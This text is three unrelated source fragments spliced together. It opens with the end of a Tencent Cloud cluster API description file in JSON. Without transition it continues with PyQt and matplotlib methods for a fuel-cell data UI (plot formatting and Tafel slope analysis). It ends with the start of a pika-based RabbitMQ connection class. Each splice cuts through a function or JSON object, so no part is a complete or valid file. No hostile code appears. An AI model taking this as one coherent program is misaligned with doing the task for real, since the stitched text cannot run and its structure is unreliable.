"desc": "Query cluster access port status (intranet / extranet access is enabled for independent clusters, and intranet access is supported for managed clusters)"
},
"DescribeClusterAsGroups": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "AutoScalingGroupIds",
"desc": "Scaling group ID list. If this value is null, it indicates that all cluster-associated scaling groups are pulled."
},
{
"name": "Offset",
"desc": "Offset. This value defaults to 0. For more information on Offset, see the relevant sections in API [Overview](https://cloud.tencent.com/document/api/213/15688)."
},
{
"name": "Limit",
"desc": "Number of returned results. This value defaults to 20. The maximum is 100. For more information on Limit, see the relevant sections in API [Overview](https://cloud.tencent.com/document/api/213/15688)."
}
],
"desc": "Cluster-associated scaling group list"
},
"CreateClusterEndpoint": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
self.get_ax_vis()
try:
xmin = float(xmin_text)
ax.set_xbound(lower=xmin)
except ValueError:
self.update_status('xmin must be a number')
try:
xmax = float(xmax_text)
ax.set_xbound(upper=xmax)
except ValueError:
self.update_status('xmax must be a number')
self.figcanvas_vis.draw()
def ylim_action_vis(self):
ymin_text = self.ymin_txtbx_vis.text()
ymax_text = self.ymax_txtbx_vis.text()
ax = self.get_ax_vis()
try:
ymin = float(ymin_text)
ax.set_ybound(lower=ymin)
except ValueError:
self.update_status('ymin must be a number')
try:
ymax = float(ymax_text)
ax.set_ybound(upper=ymax)
except ValueError:
self.update_status('ymax must be a number')
self.figcanvas_vis.draw()
def clear_action_vis(self):
self.vishandler.set_data([], replace=True)
fig = self.figcanvas_vis.figure
fig.clf()
self.lineselector_menu_vis.clear()
self.useexisting_chkbx_vis.setCheckState(Qt.Unchecked)
def figsize_action_vis(self):
fig = self.figcanvas_vis.figure
width = self.figw_txtbx_vis.text()
height = self.figh_txtbx_vis.text()
try:
width = float(width)
height = float(height)
fig.set_figwidth(width)
fig.set_figheight(height)
self.figcanvas_vis.draw()
except ValueError:
self.update_status('Figure width and height must be numbers')
def lineselector_action_vis(self):
try:
label = self.lineselector_menu_vis.currentText()
data = self.line_dict_vis[label]
line = data.get_line()
linestyle = line.get_linestyle()
linewidth = line.get_linewidth()
markerstyle = line.get_marker()
markersize = line.get_markersize()
self.linelbl_txtbx_vis.setText(label)
self.linestyle_menu_vis.setCurrentText(linestyle)
self.linewidth_txtbx_vis.setValue(linewidth)
self.markerstyle_menu_vis.setCurrentText(Line2D.markers[markerstyle])
self.markersize_txtbx_vis.setValue(int(markersize))
except KeyError:
pass
def linelbl_action_vis(self):
try:
old_label = self.lineselector_menu_vis.currentText()
new_label = self.linelbl_txtbx_vis.text()
if old_label != new_label:
data = self.line_dict_vis[old_label]
ax = self.get_ax_vis()
line = data.get_line()
line.set_label(new_label)
data.set_label(new_label)
self.shwowleg_action_vis()
self.figcanvas_vis.draw()
self.line_dict_vis = {d.get_label():d for d in self.vishandler.get_plot_data()}
self.lineselector_menu_vis.clear()
for n in self.line_dict_vis.keys():
self.lineselector_menu_vis.addItem(n)
self.lineselector_menu_vis.setCurrentText(new_label)
except KeyError:
pass
def linecolor_action_vis(self):
try:
label = self.lineselector_menu_vis.currentText()
data = self.line_dict_vis[label]
line = data.get_line()
old_color = line.get_color()
qd = QColorDialog()
new_color = qd.getColor(initial=QColor(old_color)).name(QColor.HexRgb)
line.set_color(new_color)
self.shwowleg_action_vis()
self.figcanvas_vis.draw()
except KeyError:
pass
def linestyle_action_vis(self):
try:
label = self.lineselector_menu_vis.currentText()
ls = self.linestyle_menu_vis.currentText()
data = self.line_dict_vis[label]
line = data.get_line()
line.set_linestyle(ls)
self.shwowleg_action_vis()
self.figcanvas_vis.draw()
except KeyError:
pass
def linewidth_action_vis(self):
try:
label = self.lineselector_menu_vis.currentText()
lw = self.linewidth_txtbx_vis.value()
data = self.line_dict_vis[label]
line = data.get_line()
line.set_linewidth(lw)
self.shwowleg_action_vis()
self.figcanvas_vis.draw()
except KeyError:
pass
def markerstyle_action_vis(self):
try:
label = self.lineselector_menu_vis.currentText()
m = self.markerstyle_menu_vis.currentText()
data = self.line_dict_vis[label]
line = data.get_line()
line.set_marker(FuelcellUI.markerstyles_rev[m])
self.shwowleg_action_vis()
self.figcanvas_vis.draw()
except KeyError:
pass
def markersize_action_vis(self):
try:
label = self.lineselector_menu_vis.currentText()
ms = self.markersize_txtbx_vis.value()
data = self.line_dict_vis[label]
line = data.get_line()
line.set_markersize(int(ms))
self.shwowleg_action_vis()
self.figcanvas_vis.draw()
except KeyError:
pass
def choose_saveloc_vis(self):
fd = QFileDialog()
fd.setViewMode(QFileDialog.Detail)
fd.setDefaultSuffix('png')
filename, _ = fd.getSaveFileName(self, 'Save Location', self.default_saveloc_vis())
if not filename:
filename = self.default_saveloc_vis()
self.saveloc_txtbx_vis.setText(filename)
def save_action_vis(self):
try:
fig = self.figcanvas_vis.figure
loc = self.saveloc_txtbx_vis.text()
dpi = self.figres_txtbx_vis.text()
if not dpi.isdigit():
self.update_status('Figure resolution must be an integer')
dpi = 300
else:
dpi = int(dpi)
fig.savefig(loc, dpi=dpi)
self.update_status('Image saved successfully')
except Exception as e:
self.update_status('ERROR: ' + str(e))
def draw_plot_vis(self):
fig = self.figcanvas_vis.figure
fig.clf()
ax = fig.subplots()
self.vishandler.draw_plot(ax)
self.xlabel_txtbx_vis.setText(ax.get_xlabel())
self.ylabel_txtbx_vis.setText(ax.get_ylabel())
# self.xmin_txtbx_vis.setText(f'{ax.get_xlim()[0]:.2f}')
# self.xmax_txtbx_vis.setText(f'{ax.get_xlim()[1]:.2f}')
# self.ymin_txtbx_vis.setText(f'{ax.get_ylim()[0]:.2f}')
# self.ymax_txtbx_vis.setText(f'{ax.get_ylim()[1]:.2f}')
self.line_dict_vis = {d.get_label():d for d in self.vishandler.get_plot_data()}
self.lineselector_menu_vis.clear()
for n in self.line_dict_vis.keys():
self.lineselector_menu_vis.addItem(n)
self.shwowleg_action_vis()
ax.tick_params(axis='both', direction='in')
self.figcanvas_vis.draw()
def get_ax_vis(self):
fig = self.figcanvas_vis.figure
ax = fig.get_axes()
return ax[0]
def default_saveloc_vis(self):
dataloc = self.folder_txtbx_data.text()
saveloc = os.path.join(dataloc, 'figures')
if not os.path.exists(saveloc):
os.mkdir(saveloc)
return saveloc
##################
# Tafel Analysis #
##################
### tafel layout ###
def tafel_layout(self):
# data selection header
self.header_tafel = QLabel('Tafel Analysis')
self.header_tafel.setFont(FuelcellUI.headerfont)
# use existing widgets
self.useexisting_chkbx_tafel = QCheckBox('Use previously loaded data')
self.useexisting_chkbx_tafel.setCheckState(Qt.Unchecked)
self.useexisting_chkbx_tafel.setLayoutDirection(Qt.RightToLeft)
# folder selection widgets
self.folder_lbl_tafel = QLabel('Data folder')
self.folder_txtbx_tafel = QLineEdit(FuelcellUI.homedir)
self.folder_btn_tafel = QPushButton('Choose folder...')
#file selection widgets
self.file_lbl_tafel = QLabel('Data files')
self.file_txtbx_tafel = QLineEdit()
self.file_btn_tafel = QPushButton('Choose files...')
# load data button
self.loaddata_btn_tafel = QPushButton('Load data')
#figure layout
self.figlayout_tafel = self.figure_layout_tafel()
# save plot header
self.header_saveplot_tafel = QLabel('Save Plot')
self.header_saveplot_tafel.setFont(FuelcellUI.headerfont)
# save plot widgets
self.saveloc_lbl_tafel = QLabel('Save location')
self.saveloc_txtbx_tafel = QLineEdit()
self.saveloc_btn_tafel = QPushButton('Choose location...')
self.save_btn_tafel = QPushButton('Save Current Figure')
# connect widgets
self.useexisting_chkbx_tafel.stateChanged.connect(self.useexisting_action_tafel)
self.folder_txtbx_tafel.textChanged.connect(self.folder_action_tafel)
self.folder_btn_tafel.clicked.connect(self.choose_folder_tafel)
self.file_txtbx_tafel.textChanged.connect(self.file_action_tafel)
self.file_btn_tafel.clicked.connect(self.choose_files_tafel)
self.loaddata_btn_tafel.clicked.connect(self.loaddata_action_tafel)
self.saveloc_btn_tafel.clicked.connect(self.choose_saveloc_tafel)
self.save_btn_tafel.clicked.connect(self.save_action_tafel)
# build layout
layout = QGridLayout()
row = 0
layout.addWidget(self.header_tafel, row, 0, 1, -1, Qt.AlignHCenter)
row += 1
layout.addWidget(self.useexisting_chkbx_tafel, row, 0, 1, -1, Qt.AlignRight)
row += 1
layout.addWidget(self.folder_lbl_tafel, row, 0)
layout.addWidget(self.folder_txtbx_tafel, row, 1)
layout.addWidget(self.folder_btn_tafel, row, 2)
row += 1
layout.addWidget(self.file_lbl_tafel, row, 0)
layout.addWidget(self.file_txtbx_tafel, row, 1)
layout.addWidget(self.file_btn_tafel, row, 2)
row += 1
layout.addWidget(self.loaddata_btn_tafel, row, 0, 1, -1, Qt.AlignHCenter)
row += 1
layout.addLayout(self.figlayout_tafel, row, 0, 1, -1, Qt.AlignLeft)
row += 1
layout.addWidget(self.header_saveplot_tafel, row, 0, 1, -1, Qt.AlignHCenter)
row += 1
layout.addWidget(self.saveloc_lbl_tafel, row, 0)
layout.addWidget(self.saveloc_txtbx_tafel, row, 1)
layout.addWidget(self.saveloc_btn_tafel, row, 2)
row += 1
layout.addWidget(self.save_btn_tafel, row, 0, 1, -1, Qt.AlignHCenter)
return layout
def figure_layout_tafel(self):
# plot features header
self.header_plotparams_tafel = QLabel('Plot Options')
self.header_plotparams_tafel.setFont(FuelcellUI.headerfont)
# # visualization selection widgets
# self.vistype_lbl = QLabel('Visualization type')
# self.vistype_menu = QComboBox()
# for name in FuelcellUI.vis_types:
# self.vistype_menu.addItem(name)
# column selection layout
self.colslayout_tafel = self.colselection_layout_tafel()
# plot features
self.plotfeatures_tafel = self.plotfeatures_layout_tafel()
# actual figure
self.figcanvas_tafel = FigureCanvas(Figure(figsize=FuelcellUI.default_figsize))
self.figcanvas_tafel.figure.subplots()
# line properties header
self.header_lineprops_tafel = QLabel('Line Options')
self.header_lineprops_tafel.setFont(FuelcellUI.headerfont)
# line selector menu
self.lineselector_lbl_tafel = QLabel('line')
self.lineselector_menu_tafel = QComboBox()
# for n in FuelcellUI.tintin:
# self.lineselector_menu_tafel.addItem(n)
# line properties layout
# figure properties
self.figprops_tafel = self.figprops_layout_tafel()
self.lineselector_menu_tafel.currentTextChanged.connect(self.lineselector_action_tafel)
# build layout
layout = QGridLayout()
layout.addWidget(self.header_plotparams_tafel, 0, 0, 1, 2, Qt.AlignHCenter)
# layout.addWidget(self.vistype_lbl, 1, 0, Qt.AlignLeft)
# layout.addWidget(self.vistype_menu, 1, 1, Qt.AlignLeft)
layout.addLayout(self.colslayout_tafel, 1, 0, 1, 2, Qt.AlignLeft)
layout.addLayout(self.plotfeatures_tafel, 2, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.figcanvas_tafel, 0, 2, 3, 1, Qt.AlignHCenter)
layout.addLayout(self.figprops_tafel, 3, 2, 1, 1, Qt.AlignHCenter)
layout.addWidget(self.header_lineprops_tafel, 0, 3, 1, 2, Qt.AlignHCenter)
layout.addWidget(self.lineselector_lbl_tafel, 1, 3, Qt.AlignLeft)
layout.addWidget(self.lineselector_menu_tafel, 1, 4, Qt.AlignLeft)
return layout
def colselection_layout_tafel(self):
# x column
self.xcol_lbl_tafel = QLabel('log(current) column')
self.xcol_txtbx_tafel = QLineEdit('0')
# y column
self.ycol_lbl_tafel = QLabel('Overpotential column')
self.ycol_txtbx_tafel = QLineEdit('1')
self.xcol_txtbx_tafel.textChanged.connect(self.xcol_action_tafel)
self.ycol_txtbx_tafel.textChanged.connect(self.ycol_action_tafel)
# build layout
layout = QGridLayout()
row = 0
layout.addWidget(self.xcol_lbl_tafel, row, 0, Qt.AlignLeft)
layout.addWidget(self.xcol_txtbx_tafel, row, 1, Qt.AlignLeft)
row += 1
layout.addWidget(self.ycol_lbl_tafel, row, 0, Qt.AlignLeft)
layout.addWidget(self.ycol_txtbx_tafel, row, 1, Qt.AlignLeft)
# resize widgets
for i in range(layout.count()):
w = layout.itemAt(i).widget()
if isinstance(w, QLineEdit):
self.set_max_width(w, 1.5)
return layout
def plotfeatures_layout_tafel(self):
# Tafel Values
self.tafel_slope_lbl = QLabel('Tafel slope: ')
self.tafel_slope_val = QLabel('')
self.tafel_exchg_lbl = QLabel('Exchange current density: ')
self.tafel_exchg_val = QLabel('')
self.tafel_rsq_lbl = QLabel('Linearity (R-squared):')
self.tafel_rsq_val = QLabel('')
self.tafel_slope_val.setFont(FuelcellUI.valuefont)
self.tafel_exchg_val.setFont(FuelcellUI.valuefont)
self.tafel_rsq_val.setFont(FuelcellUI.valuefont)
# x-axis label
self.xlabel_lbl_tafel = QLabel('x-axis label')
self.xlabel_txtbx_tafel = QLineEdit('log(current)')
# y-axis label
self.ylabel_lbl_tafel = QLabel('y-axis label')
self.ylabel_txtbx_tafel = QLineEdit('Overpotential [V]')
# current limits
self.mincurr_lbl_tafel = QLabel('Lower bound')
self.mincurr_txtbx_tafel = QLineEdit()
self.maxcurr_lbl_tafel = QLabel('Upper bound')
self.maxcurr_txtbx_tafel = QLineEdit()
# x-axis limits
self.xmin_lbl_tafel = QLabel('x min')
self.xmin_txtbx_tafel = QLineEdit()
self.xmax_lbl_tafel = QLabel('x max')
self.xmax_txtbx_tafel = QLineEdit()
# y-axis limits
self.ymin_lbl_tafel = QLabel('y min')
self.ymin_txtbx_tafel = QLineEdit()
self.ymax_lbl_tafel = QLabel('y max')
self.ymax_txtbx_tafel = QLineEdit()
# connect widgets
self.xlabel_txtbx_tafel.textChanged.connect(self.xlabel_action_tafel)
self.ylabel_txtbx_tafel.textChanged.connect(self.ylabel_action_tafel)
self.xmin_txtbx_tafel.textChanged.connect(self.xlim_action_tafel)
self.xmax_txtbx_tafel.textChanged.connect(self.xlim_action_tafel)
self.ymin_txtbx_tafel.textChanged.connect(self.ylim_action_tafel)
self.ymax_txtbx_tafel.textChanged.connect(self.ylim_action_tafel)
self.mincurr_txtbx_tafel.textChanged.connect(self.mincurr_action_tafel)
self.maxcurr_txtbx_tafel.textChanged.connect(self.maxcurr_action_tafel)
# build layout
layout = QGridLayout()
row = 0
layout.addWidget(self.mincurr_lbl_tafel, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.mincurr_txtbx_tafel, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.maxcurr_lbl_tafel, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.maxcurr_txtbx_tafel, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.tafel_slope_lbl, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.tafel_slope_val, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.tafel_exchg_lbl, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.tafel_exchg_val, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.tafel_rsq_lbl, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.tafel_rsq_val, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.xlabel_lbl_tafel, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.xlabel_txtbx_tafel, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.ylabel_lbl_tafel, row, 0, 1, 2, Qt.AlignLeft)
layout.addWidget(self.ylabel_txtbx_tafel, row, 2, 1, 2, Qt.AlignLeft)
# row += 1
# layout.addWidget(self.mincurr_lbl_tafel, row, 0, 1, 2, Qt.AlignLeft)
# layout.addWidget(self.mincurr_txtbx_tafel, row, 2, 1, 2, Qt.AlignLeft)
# row += 1
# layout.addWidget(self.maxcurr_lbl_tafel, row, 0, 1, 2, Qt.AlignLeft)
# layout.addWidget(self.maxcurr_txtbx_tafel, row, 2, 1, 2, Qt.AlignLeft)
row += 1
layout.addWidget(self.xmin_lbl_tafel, row, 0, Qt.AlignLeft)
layout.addWidget(self.xmin_txtbx_tafel, row, 1, Qt.AlignLeft)
layout.addWidget(self.xmax_lbl_tafel, row, 2, Qt.AlignLeft)
layout.addWidget(self.xmax_txtbx_tafel, row, 3, Qt.AlignLeft)
row += 1
layout.addWidget(self.ymin_lbl_tafel, row, 0, Qt.AlignLeft)
layout.addWidget(self.ymin_txtbx_tafel, row, 1, Qt.AlignLeft)
layout.addWidget(self.ymax_lbl_tafel, row, 2, Qt.AlignLeft)
layout.addWidget(self.ymax_txtbx_tafel, row, 3, Qt.AlignLeft)
# resize widgets
for i in range(layout.count()):
w = layout.itemAt(i).widget()
if isinstance(w, QLineEdit):
self.set_min_height(w)
# self.set_min_width(w)
if isinstance(w, QLabel):
self.set_max_height(w, 1.5)
self.set_max_width(self.xmin_txtbx_tafel, 0.5)
self.set_max_width(self.xmax_txtbx_tafel, 0.5)
self.set_max_width(self.ymin_txtbx_tafel, 0.5)
self.set_max_width(self.ymax_txtbx_tafel, 0.5)
return layout
def figprops_layout_tafel(self):
# fig width
self.figw_lbl_tafel = QLabel('Figure width')
self.figw_txtbx_tafel = QLineEdit(str(FuelcellUI.default_figsize[0]))
# fig height
self.figh_lbl_tafel = QLabel('Figure height')
self.figh_txtbx_tafel = QLineEdit(str(FuelcellUI.default_figsize[1]))
# fig resolution
self.figres_lbl_tafel = QLabel('Figure resolution (DPI)')
self.figres_txtbx_tafel = QLineEdit(str(FuelcellUI.default_figres))
self.figw_txtbx_tafel.textChanged.connect(self.figsize_action_tafel)
self.figh_txtbx_tafel.textChanged.connect(self.figsize_action_tafel)
# build layout
layout = QGridLayout()
row = 0
layout.addWidget(self.figw_lbl_tafel, row, 0, Qt.AlignHCenter)
layout.addWidget(self.figh_lbl_tafel, row, 1, Qt.AlignHCenter)
layout.addWidget(self.figres_lbl_tafel, row, 2, Qt.AlignHCenter)
row += 1
layout.addWidget(self.figw_txtbx_tafel, row, 0, Qt.AlignHCenter)
layout.addWidget(self.figh_txtbx_tafel, row, 1, Qt.AlignHCenter)
layout.addWidget(self.figres_txtbx_tafel, row, 2, Qt.AlignHCenter)
for i in range(layout.count()):
w = layout.itemAt(i).widget()
if isinstance(w, QLineEdit):
self.set_max_width(w, 0.75)
return layout
### tafel actions ###
def useexisting_action_tafel(self):
state = self.useexisting_chkbx_tafel.isChecked()
if state:
if not self.datahandler.get_data():
self.update_status('No data to visualize')
self.useexisting_chkbx_tafel.setCheckState(Qt.Unchecked)
state = False
else:
self.vishandler.set_data(self.datahandler.get_data())
self.folder_lbl_tafel.setEnabled(not state)
self.folder_txtbx_tafel.setEnabled(not state)
self.folder_btn_tafel.setEnabled(not state)
self.file_lbl_tafel.setEnabled(not state)
self.file_txtbx_tafel.setEnabled(not state)
self.file_btn_tafel.setEnabled(not state)
self.loaddata_btn_tafel.setEnabled(not state)
if state:
self.draw_plot_tafel()
def choose_folder_tafel(self):
fd = QFileDialog()
filepath = fd.getExistingDirectory(self, 'Data Folder', FuelcellUI.homedir)
if filepath:
self.folder_txtbx_tafel.setText(filepath)
self.file_txtbx_tafel.setText('')
def choose_files_tafel(self):
fd = QFileDialog()
files, _ = fd.getOpenFileNames(self, 'Data Files', FuelcellUI.homedir)
if files:
names = [os.path.basename(f) for f in files]
folder = os.path.dirname(files[0])
self.file_txtbx_tafel.setText('; '.join(names))
self.folder_txtbx_tafel.setText(folder)
def folder_action_tafel(self):
try:
folder = self.folder_txtbx_tafel.text()
self.vishandler.set_datafolder(folder)
self.file_action_tafel()
except Exception as e:
self.update_status('ERROR: ' + str(e))
def file_action_tafel(self):
file_str = self.file_txtbx_tafel.text()
folder = self.folder_txtbx_tafel.text()
try:
if not file_str:
files = self.get_all_files(folder, valid=fc.utils.valid_types)
self.file_txtbx_tafel.setText('; '.join(files))
else:
files = file_str.split('; ')
files = [os.path.join(folder, f) for f in files]
self.vishandler.set_datafiles(files)
except Exception as e:
self.update_status('ERROR: ' + str(e))
def loaddata_action_tafel(self):
try:
self.vishandler.load_tafel()
self.draw_plot_tafel()
except Exception as e:
self.update_status('ERROR: ' + str(e))
def xcol_action_tafel(self):
col = self.xcol_txtbx_tafel.text()
if col.isdigit():
col = int(col)
self.vishandler.set_xcol(col)
self.draw_plot_tafel()
def ycol_action_tafel(self):
col = self.ycol_txtbx_tafel.text()
if col.isdigit():
col = int(col)
self.vishandler.set_ycol(col)
self.draw_plot_tafel()
def mincurr_action_tafel(self):
new_min = self.mincurr_txtbx_tafel.text()
new_max = self.maxcurr_txtbx_tafel.text()
try:
new_min = float(new_min)
except ValueError:
new_min = None
self.update_status('bounds must be numbers')
try:
new_max = float(new_max)
except ValueError:
new_max = None
self.update_status('bounds must be numbers')
try:
fig = self.figcanvas_tafel.figure
fig.clf()
ax = self.figcanvas_tafel.figure.subplots()
this_data = self.tafel_dict[self.lineselector_menu_tafel.currentText()]
fc.visuals.plot_tafel(data=[this_data], ax=ax, imin=new_min, imax=new_max)
self.tafel_slope_val.setText(str(this_data.get_tafel_slope()))
self.tafel_exchg_val.setText(str(this_data.get_exchg_curr()))
self.tafel_rsq_val.setText(str(this_data.get_tafel_rsq()))
self.figcanvas_tafel.draw()
except Exception as e:
self.update_status('ERROR: ' + str(e))
def maxcurr_action_tafel(self):
new_max = self.maxcurr_txtbx_tafel.text()
new_min = self.mincurr_txtbx_tafel.text()
try:
new_min = float(new_min)
except ValueError:
new_min = None
self.update_status('bounds must be numbers')
try:
new_max = float(new_max)
except ValueError:
new_max = None
self.update_status('bounds must be numbers')
try:
fig = self.figcanvas_tafel.figure
fig.clf()
ax = self.figcanvas_tafel.figure.subplots()
this_data = self.tafel_dict[self.lineselector_menu_tafel.currentText()]
fc.visuals.plot_tafel(data=[this_data], ax=ax, imax=new_max, imin=new_min)
self.tafel_slope_val.setText(str(this_data.get_tafel_slope()))
self.tafel_exchg_val.setText(str(this_data.get_exchg_curr()))
self.tafel_rsq_val.setText(str(this_data.get_tafel_rsq()))
self.figcanvas_tafel.draw()
except Exception as e:
self.update_status('ERROR: ' + str(e))
def xlabel_action_tafel(self):
new_label = self.xlabel_txtbx_tafel.text()
ax = self.get_ax_tafel()
ax.set_xlabel(new_label)
self.figcanvas_tafel.draw()
def ylabel_action_tafel(self):
new_label = self.ylabel_txtbx_tafel.text()
ax = self.get_ax_tafel()
ax.set_ylabel(new_label)
self.figcanvas_tafel.draw()
def xlim_action_tafel(self):
xmin_text = self.xmin_txtbx_tafel.text()
xmax_text = self.xmax_txtbx_tafel.text()
ax = self.get_ax_tafel()
try:
xmin = float(xmin_text)
ax.set_xbound(lower=xmin)
except ValueError:
self.update_status('xmin must be a number')
try:
xmax = float(xmax_text)
ax.set_xbound(upper=xmax)
except ValueError:
self.update_status('xmax must be a number')
self.figcanvas_tafel.draw()
def ylim_action_tafel(self):
ymin_text = self.ymin_txtbx_tafel.text()
ymax_text = self.ymax_txtbx_tafel.text()
ax = self.get_ax_tafel()
try:
ymin = float(ymin_text)
ax.set_ybound(lower=ymin)
except ValueError:
self.update_status('ymin must be a number')
try:
ymax = float(ymax_text)
ax.set_ybound(upper=ymax)
except ValueError:
self.update_status('ymax must be a number')
self.figcanvas_tafel.draw()
def figsize_action_tafel(self):
fig = self.figcanvas_tafel.figure
width = self.figw_txtbx_tafel.text()
height = self.figh_txtbx_tafel.text()
try:
width = float(width)
height = float(height)
fig.set_figwidth(width)
fig.set_figheight(height)
self.figcanvas_tafel.draw()
except ValueError:
self.update_status('Figure width and height must be numbers')
def lineselector_action_tafel(self):
try:
new_label = self.lineselector_menu_tafel.currentText()
new_data = self.tafel_dict[new_label]
fig = self.figcanvas_tafel.figure
fig.clf()
ax = self.figcanvas_tafel.figure.subplots()
fc.visuals.plot_tafel(data=[new_data], ax=ax)
self.figcanvas_tafel.draw()
self.tafel_slope_val.setText(str(new_data.get_tafel_slope()))
self.tafel_exchg_val.setText(str(new_data.get_exchg_curr()))
self.tafel_rsq_val.setText(str(new_data.get_tafel_rsq()))
except TypeError:
self.update_status('Invalid fit parameters')
def choose_saveloc_tafel(self):
fd = QFileDialog()
fd.setViewMode(QFileDialog.Detail)
fd.setDefaultSuffix('png')
filename, _ = fd.getSaveFileName(self, 'Save Location', self.default_saveloc_vis())
if not filename:
filename = self.default_saveloc_vis()
self.saveloc_txtbx_tafel.setText(filename)
def save_action_tafel(self):
try:
fig = self.figcanvas_tafel.figure
loc = self.saveloc_txtbx_tafel.text()
dpi = self.figres_txtbx_tafel.text()
if not dpi.isdigit():
self.update_status('Figure resolution must be an integer')
dpi = 300
else:
dpi = int(dpi)
fig.savefig(loc, dpi=dpi)
self.update_status('Image saved successfully')
except Exception as e:
self.update_status('ERROR: ' + str(e))
def draw_plot_tafel(self):
try:
fig = self.figcanvas_tafel.figure
fig.clf()
ax = self.figcanvas_tafel.figure.subplots()
tafel_data = self.vishandler.get_tafel_data()
self.tafel_dict = {d.get_label():d for d in tafel_data}
for n in self.tafel_dict.keys():
self.lineselector_menu_tafel.addItem(n)
this_data = tafel_data[0]
# name = self.lineselector_menu_tafel.currentText()
# data = self.tafel_dict[name]
# self.hfrsemi_val.setText(str(data.get_hfr()))
# self.hfrlin_val.setText(str(data.get_hfr_linear()))
fc.visuals.plot_tafel(data=[this_data], ax=ax)
self.tafel_slope_val.setText(str(this_data.get_tafel_slope()))
self.tafel_exchg_val.setText(str(this_data.get_exchg_curr()))
self.tafel_rsq_val.setText(str(this_data.get_tafel_rsq()))
self.figcanvas_tafel.draw()
except Exception as e:
self.update_status('ERROR: ' + str(e))
def get_ax_tafel(self):
fig = self.figcanvas_tafel.figure
ax = fig.get_axes()
return ax[0]
###########################
# Bayesian Tafel Analysis #
###########################
### bayes layout ###
def bayes_layout(self):
# data selection header
self.header_bayes = QLabel('Bayesian Tafel Analysis')
self.header_bayes.setFont(FuelcellUI.headerfont)
# use existing widgets
self.useexisting_chkbx_bayes = QCheckBox('Use previously loaded data')
self.useexisting_chkbx_bayes.setCheckState(Qt.Unchecked)
self.useexisting_chkbx_bayes.setLayoutDirection(Qt.RightToLeft)
# folder selection widgets
self.folder_lbl_bayes = QLabel('Data folder')
self.folder_txtbx_bayes = QLineEdit(FuelcellUI.homedir)
self.folder_btn_bayes = QPushButton('Choose folder...')
#file selection widgets
self.file_lbl_bayes = QLabel('Data files')
self.file_txtbx_bayes = QLineEdit()
self.file_btn_bayes = QPushButton('Choose files...')
# load data button
self.loaddata_btn_bayes = QPushButton('Load data')
# figure layout
self.figlayout_bayes = self.figure_layout_bayes()
# save plot header
self.header_saveplot_bayes = QLabel('Save Plot')
self.header_saveplot_bayes.setFont(FuelcellUI.headerfont)
# save plot widgets
self.saveloc_lbl_bayes = QLabel('Save location')
self.saveloc_txtbx_bayes = QLineEdit()
self.saveloc_btn_bayes = QPushButton('Choose location...')
self.save_btn_bayes = QPushButton('Save Current Figure')
# connect widgets
self.useexisting_chkbx_bayes.stateChanged.connect(self.useexisting_action_bayes)
self.folder_txtbx_bayes.textChanged.connect(self.folder_action_bayes)
self.folder_btn_bayes.clicked.connect(self.choose_folder_bayes)
self.file_txtbx_bayes.textChanged.connect(self.file_action_bayes)
self.file_btn_bayes.clicked.connect(self.choose_files_bayes)
self.loaddata_btn_bayes.clicked.connect(self.loaddata_action_bayes)
self.saveloc_btn_bayes.clicked.connect(self.choose_saveloc_bayes)
self.save_btn_bayes.clicked.connect(self.save_action_bayes)
# build layout
layout = QGridLayout()
row = 0
layout.addWidget(self.header_bayes, row, 0, 1, -1, Qt.AlignHCenter)
row += 1
layout.addWidget(self.useexisting_chkbx_bayes, row, 0, 1, -1, Qt.AlignRight)
row += 1
layout.addWidget(self.folder_lbl_bayes, row, 0)
layout.addWidget(self.folder_txtbx_bayes, row, 1)
layout.addWidget(self.folder_btn_bayes, row, 2)
row += 1
layout.addWidget(self.file_lbl_bayes, row, 0)
layout.addWidget(self.file_txtbx_bayes, row, 1)
layout.addWidget(self.file_btn_bayes, row, 2)
row += 1
layout.addWidget(self.loaddata_btn_bayes, row, 0, 1, -1, Qt.AlignHCenter)
# -*- coding: utf-8 -*-
# pylint: disable=C0111,C0103,R0205
__author__ = 'guotengfei'
import functools
import logging
import traceback
import pika
from pika.adapters.tornado_connection import TornadoConnection
LOGGER = logging.getLogger(__name__)
# Exception-catching decorator
def exception_catch(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
LOGGER.error("conn init Error: %s", repr(e))
LOGGER.error(traceback.format_exc())
conn = args[0]
conn.close_channel()
return wrapper
class MQConnection(object):
"""
MQ connection management class.
"""
def __init__(self, url, type='producer', callback=None, *arg, **settings):
"""Create a new instance of the MQConnection class, passing in the AMQP
URL used to connect to RabbitMQ.
:param str amqp_url: The AMQP url to connect with
:param str type: connection type,for excmple,'consumer','producer'
:param str callback: if type is 'consumer',callback is not None
"""
self._connection = None
self._channel = None
self._closing = False
self._consumer_tag = None
self._url = url
self._type = type
self._was_consuming = False
self._was_publishing = False
self._reconnect_delay = 0
self._callback = callback
self.EXCHANGE = settings.get('exchange')
self.QUEUE = settings.get('queue')
self.ROUTING_KEY = settings.get('routing_key')
self.EXCHANGE_TYPE = settings.get('exchange_type')
self.AE_EXCHANGE = settings.get('ae_exchange')
self.AE_QUEUE = settings.get('ae_queue')
self.AE_EXCHANGE_TYPE = settings.get('ae_exchange_type')
self.DL_EXCHANGE = settings.get('dl_exchange')
self.DL_QUEUE = settings.get('dl_queue')
self.DL_EXCHANGE_TYPE = settings.get('dl_exchange_type')
self._passive = settings.get('passive', True)
self._durable = settings.get('durable', True)
self._prefetch_count = settings.get('prefetch_count', 128)
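# Usage sketch (illustrative only; the URL, exchange/queue names and the
# `handle_message` callback below are placeholders, and the callback's exact
# signature depends on how the consuming code invokes it):
#
#     conn = MQConnection(
#         "amqp://guest:guest@localhost:5672/%2F",
#         type="consumer",
#         callback=handle_message,
#         exchange="demo.exchange",
#         exchange_type="topic",
#         queue="demo.queue",
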